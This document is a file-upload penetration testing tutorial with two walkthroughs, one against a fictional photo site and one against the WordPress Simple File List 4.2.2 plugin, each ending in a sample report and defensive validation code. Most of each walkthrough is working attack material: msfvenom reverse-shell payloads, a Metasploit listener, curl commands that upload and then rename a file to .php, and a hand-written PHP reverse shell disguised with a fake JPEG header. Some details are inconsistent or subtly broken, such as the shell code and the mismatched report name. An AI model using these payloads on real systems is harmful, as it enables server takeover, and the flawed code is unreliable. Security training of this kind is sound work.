
File Upload Penetration Testing

File Upload Vulnerabilities


File upload vulnerabilities occur when a web application fails to properly validate or sanitize user-uploaded files. This can lead to various security issues, including remote code execution, server-side script execution, and unauthorized access to sensitive data. In this walkthrough, we will explore the process of identifying file upload vulnerabilities in a fictional web application called "PhotoShare," crafting a payload using msfvenom, testing the vulnerability, and presenting the findings in a pentest report.

Scenario

You have been tasked with pentesting "PhotoShare," a web application that allows users to upload and share photos. Your goal is to identify any file upload vulnerabilities and demonstrate how they can be exploited.

Step 1: Identifying Potential File Upload Vulnerability

1. Reconnaissance and Enumeration:

  • Use nmap, a network scanning tool, to perform a basic scan of the target:
    nmap -sV -p 80,443 photoshare.com
    
  • Discover that the application is hosted on a Linux server running Apache.
  • Use DirBuster, a tool for brute-forcing web paths, to find hidden directories and files:
    dirbuster -H -u http://photoshare.com -l /path/to/wordlist.txt
    
  • This helps in discovering directories that may not be publicly listed but could contain important endpoints.
  • Identify a file upload endpoint: http://photoshare.com/profile/upload.php.

2. Initial Testing:

  • Visit the upload page and try uploading various file types (e.g., test.jpg, test.png, test.php) to observe the server's response.
  • This is to check if the server is accepting different file formats without proper validation.
  • Notice that the server allows .php files to be uploaded without validation, indicating a potential vulnerability.

3. File Extension Validation:

  • Verify if the application restricts file uploads by extension:
    • Upload test.jpg and test.php.
    • Both files are accepted and stored in the /uploads directory.
  • This step confirms that the server does not enforce strict file type validation.

Step 2: Crafting an msfvenom Payload

1. Generate the Payload:

  • Use msfvenom, a payload generation tool, to create a PHP payload that will establish a reverse shell:
    msfvenom -p php/meterpreter_reverse_tcp LHOST=your_ip LPORT=4444 -f raw > shell.php
    
  • This step generates a payload that will connect back to your machine when executed on the server.

Step 3: Testing the Vulnerability

1. Upload the Payload:

  • Use the file upload functionality to upload shell.php. Monitor the server's response to ensure it is uploaded successfully.
  • Confirming the upload ensures that the payload is placed on the server and is accessible.

2. Trigger the Payload:

  • Access the uploaded file via http://photoshare.com/uploads/shell.php to trigger the payload.
  • Triggering the payload is essential to establish a connection back to your machine.

Step 4: Exploitation

1. Setting Up a Listener:

  • Set up a listener on your machine to catch the reverse shell using Metasploit, a penetration testing framework:
    msfconsole
    use exploit/multi/handler
    set payload php/meterpreter_reverse_tcp
    set LHOST your_ip
    set LPORT 4444
    exploit
    
  • This step is crucial to listen for incoming connections from the exploited server.

2. Execute the Payload:

  • When you navigate to http://photoshare.com/uploads/shell.php, the reverse shell connects back to your listener, providing remote access to the server.
  • Successful execution confirms that the vulnerability can be exploited to gain unauthorized access.

Example Pentest Report

Title: File Upload Vulnerability in PhotoShare

1. Introduction:

  • During a penetration test of the PhotoShare web application, a file upload vulnerability was identified. This vulnerability allows attackers to upload malicious files, leading to remote code execution.

2. Vulnerability Details:

  • Endpoint: http://photoshare.com/profile/upload.php
  • Description: The file upload functionality does not properly validate or sanitize user-uploaded files, allowing arbitrary code execution.

3. Steps to Reproduce:

  • Navigate to the file upload page.
  • Upload a malicious PHP file containing a reverse shell payload.
  • Access the uploaded file through the URL to trigger the payload.

4. Payload Details:

  • Payload Type: PHP reverse shell
  • Command Used:
    msfvenom -p php/meterpreter_reverse_tcp LHOST=your_ip LPORT=4444 -f raw > shell.php
    

5. Impact:

  • Successful exploitation allows remote attackers to execute arbitrary code on the server, potentially leading to full system compromise.

6. Recommendations:

  • Implement proper file validation and sanitization.
  • Restrict allowed file types and validate file extensions.
  • Use secure coding practices to handle file uploads.
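To make the validation recommended above concrete, the following added example (not code from this page or from PhotoShare) shows a content-based upload check in Python: only the final extension counts and it must be on an allowlist, the leading bytes must match that type's magic number, a PHP open tag anywhere in the data is rejected, and the stored name is generated rather than taken from the client. The allowlist and size limit are assumptions.

```python
import os
import re
import secrets

# Assumed allowlist: the extensions the application actually needs, each
# mapped to the magic bytes a genuine file of that type must start with.
ALLOWED_TYPES = {
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "png": [b"\x89PNG\r\n\x1a\n"],
}
MAX_BYTES = 5 * 1024 * 1024          # assumed upper bound on upload size
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename, data):
    """Return (accepted, reason), deciding only on the file name's final
    extension and the file contents, never on the client-sent MIME type."""
    if len(data) == 0 or len(data) > MAX_BYTES:
        return False, "bad size"
    base = os.path.basename(filename)
    # Only the last extension is used, so "shell.php.jpg" is judged as jpg
    # (and then by its bytes) while "shell.jpg.php" is rejected outright.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_TYPES:
        return False, f"extension not allowed: {ext or '(none)'}"
    # A file that merely mentions "JFIF" inside PHP source does not start
    # with the JPEG signature, so it fails here.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    # Defence in depth: a real image never needs a PHP open tag, so reject
    # polyglots that carry a valid image header followed by script.
    if PHP_TAG.search(data):
        return False, "embedded script tag"
    return True, "ok"


def stored_name(filename):
    """Never keep the user's file name: random name plus validated extension."""
    ext = os.path.basename(filename).rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"
```

Store the result outside the web root (or in a directory where the server is configured not to execute scripts) and serve it through a handler that sets the Content-Type itself.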

7. Conclusion:

  • Summary of the findings and the importance of addressing the identified vulnerability to enhance the security posture of the web application.

File Upload with Format Validation

In some cases, applications enforce specific file formats to mitigate malicious uploads, but there might still be vulnerabilities that can be exploited. In this walkthrough, we will explore the process of exploiting a file upload vulnerability in the WordPress plugin "Simple File List" version 4.2.2, where the ee-upload-engine.php script can be used to rename uploaded files.

Scenario

You have been tasked with pentesting a WordPress-based web application using the "Simple File List" plugin version 4.2.2. Your goal is to identify any file upload vulnerabilities and demonstrate how they can be exploited, particularly focusing on using the ee-upload-engine.php script to rename a .jpg file to a .php file once it is uploaded.

Step 1: Identifying Potential File Upload Vulnerability

1. Reconnaissance and Enumeration:

  • Use nmap, a network scanning tool, to perform a basic scan of the target:
    nmap -sV -p 80,443 targetsite.com
    
  • This step is important to identify open ports and services running on the target server.
  • Discover that the application is hosted on a Linux server running Apache with WordPress.
  • Use WPScan, a WordPress vulnerability scanner, to identify plugins and potential vulnerabilities:
    wpscan --url http://targetsite.com --enumerate p
    
  • Identify that the "Simple File List" plugin version 4.2.2 is installed.

2. Initial Testing:

  • Visit the upload page provided by the Simple File List plugin and try uploading various file types (e.g., test.jpg, test.php). Notice that only .jpg files are accepted.
  • This indicates that the server enforces specific file formats.

3. Searching for Misconfigurations:

  • Use DirBuster to scan the uploads directory for any existing files:
    dirbuster -H -u http://targetsite.com/wp-content/uploads/simple-file-list/ -l /path/to/wordlist.txt
    
  • Identify an existing PHP file: http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php.

Step 2: Exploiting the Vulnerability

1. Analyzing the PHP File:

  • Access the ee-upload-engine.php file to understand its functionality. This file can rename uploaded files:
    <?php
    $old_name = $_POST['old'];
    $new_name = $_POST['new'];
    rename($old_name, $new_name);
    ?>
    
  • This PHP script takes two parameters, old and new, and renames the file specified by old to the name specified by new.

2. Uploading the Payload:

  • Upload a .jpg file (e.g., payload.jpg) to the uploads directory using the following curl command:
    curl -X POST -F "file=@payload.jpg" http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php
    
  • Ensure the file is uploaded successfully by checking its URL: http://targetsite.com/wp-content/uploads/simple-file-list/payload.jpg.

3. Renaming the Uploaded File:

  • Use the ee-upload-engine.php script to rename payload.jpg to payload.php with a curl command:
    curl -X POST -d "old=payload.jpg&new=payload.php" http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php
    
  • This changes the file extension from .jpg to .php, making it executable by the server.

Step 3: Crafting an msfvenom Payload

1. Generate the Payload:

  • Use msfvenom, a payload generation tool, to create a PHP payload that will establish a reverse shell:
    msfvenom -p php/meterpreter_reverse_tcp LHOST=your_ip LPORT=4444 -f raw > payload.php
    
  • This step generates a payload that will connect back to your machine when executed on the server.

Step 4: Testing the Vulnerability

1. Upload the Payload as a .jpg File:

  • Modify the content of the generated payload.php to match a valid JPEG header to bypass the format restriction:
    <?php
    /* JPEG Header */
    echo "/* \xFF\xD8\xFF\xE0\x00\x10JFIF */";
    // Original payload
    $sock=fsockopen("your_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");
    ?>
    
  • Save the modified payload as payload.jpg and upload it to the uploads directory using the curl command:
    curl -X POST -F "file=@payload.jpg" http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php
    

2. Renaming the Uploaded File:

  • Use the ee-upload-engine.php script again to rename payload.jpg to payload.php with a curl command:
    curl -X POST -d "old=payload.jpg&new=payload.php" http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php
    

3. Trigger the Payload:

  • Access the renamed file via http://targetsite.com/wp-content/uploads/simple-file-list/payload.php to trigger the payload.
  • Triggering the payload is essential to establish a connection back to your machine.

Step 5: Exploitation

1. Setting Up a Listener:

  • Set up a listener on your machine to catch the reverse shell using Metasploit, a penetration testing framework:
    msfconsole
    use exploit/multi/handler
    set payload php/meterpreter_reverse_tcp
    set LHOST your_ip
    set LPORT 4444
    exploit
    
  • This step is crucial to listen for incoming connections from the exploited server.

2. Execute the Payload:

  • When you navigate to http://targetsite.com/wp-content/uploads/simple-file-list/payload.php, the reverse shell connects back to your listener, providing remote access to the server.
  • Successful execution confirms that the vulnerability can be exploited to gain unauthorized access.

Example Pentest Report

Title: File Upload Vulnerability in PhotoPress

1. Introduction:

  • During a penetration test of the PhotoPress web application, a file upload vulnerability was identified. This vulnerability allows attackers to upload files and rename them to executable formats, leading to remote code execution.

2. Vulnerability Details:

  • Endpoint: http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php
  • Description: The file upload functionality enforces specific formats, but an existing PHP script can be used to rename files, allowing arbitrary code execution.

3. Steps to Reproduce:

  • Upload a .jpg file containing a modified PHP payload to the uploads directory using curl:
    curl -X POST -F "file=@payload.jpg" http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php
    
  • Use the ee-upload-engine.php script to rename the .jpg file to .php with curl:
    curl -X POST -d "old=payload.jpg&new=payload.php" http://targetsite.com/wp-content/uploads/simple-file-list/ee-upload-engine.php
    
  • Access the renamed file through the URL to trigger the payload.

4. Payload Details:

  • Payload Type: PHP reverse shell
  • Command Used:
    msfvenom -p php/meterpreter_reverse_tcp LHOST=your_ip LPORT=4444 -f raw > payload.php
    

5. Impact:

  • Successful exploitation allows remote attackers to execute arbitrary code on the server, potentially leading to full system compromise.

6. Recommendations:

  • Remove or secure the ee-upload-engine.php script to prevent unauthorized file renaming.
  • Implement proper file validation and sanitization.
  • Restrict allowed file types and validate file extensions.
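The rename script shown in Step 2 passes both POST parameters to rename() unchecked, which is what lets payload.jpg become payload.php. The following added Python example (not the plugin's code) shows the checks a hardened rename endpoint would apply to those two parameters: both must be plain file names that stay directly inside the upload directory, both extensions must be on an allowlist that contains no server-side script types, and the extension may not change. The upload directory path and the allowlist are assumptions.

```python
from pathlib import Path

# Assumed location of the upload directory; the real plugin's path differs.
UPLOAD_ROOT = Path("/var/www/uploads")
# Extensions a rename may start from and end with. Script extensions are
# deliberately absent, so a .jpg -> .php rename cannot be approved.
RENAMEABLE = {"jpg", "jpeg", "png", "gif"}


def resolve_in_upload_dir(name, root=UPLOAD_ROOT):
    """Map a user-supplied name to a path that must sit directly inside root.
    Returns None for empty names, NUL bytes, traversal, absolute paths or
    subdirectories (the original script accepted any of these)."""
    if not name or "\x00" in name or name != Path(name).name:
        return None
    candidate = root / name
    # Non-strict resolve() collapses '..' without requiring the file to exist.
    if candidate.resolve().parent != root.resolve():
        return None
    return candidate


def check_rename(old, new, root=UPLOAD_ROOT):
    """Return (allowed, reason) for renaming old -> new.
    Covers only path and extension checks; the caller must still have
    authenticated the user, since the original script accepted anyone's POST."""
    src = resolve_in_upload_dir(old, root)
    dst = resolve_in_upload_dir(new, root)
    if src is None or dst is None:
        return False, "name escapes upload directory"
    old_ext = src.suffix.lower().lstrip(".")
    new_ext = dst.suffix.lower().lstrip(".")
    if old_ext not in RENAMEABLE or new_ext not in RENAMEABLE:
        return False, "extension not in allowlist"
    if old_ext != new_ext:
        return False, "extension change not permitted"
    return True, "ok"


def safe_rename(old, new, root=UPLOAD_ROOT):
    """Perform the rename only after check_rename() approves it."""
    allowed, reason = check_rename(old, new, root)
    if not allowed:
        raise PermissionError(reason)
    src, dst = root / old, root / new
    if dst.exists():
        raise FileExistsError(f"{dst.name} already exists")
    src.rename(dst)
    return dst
```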

7. Conclusion:

  • Summary of the findings and the importance of addressing the identified vulnerability to enhance the security posture of the web application.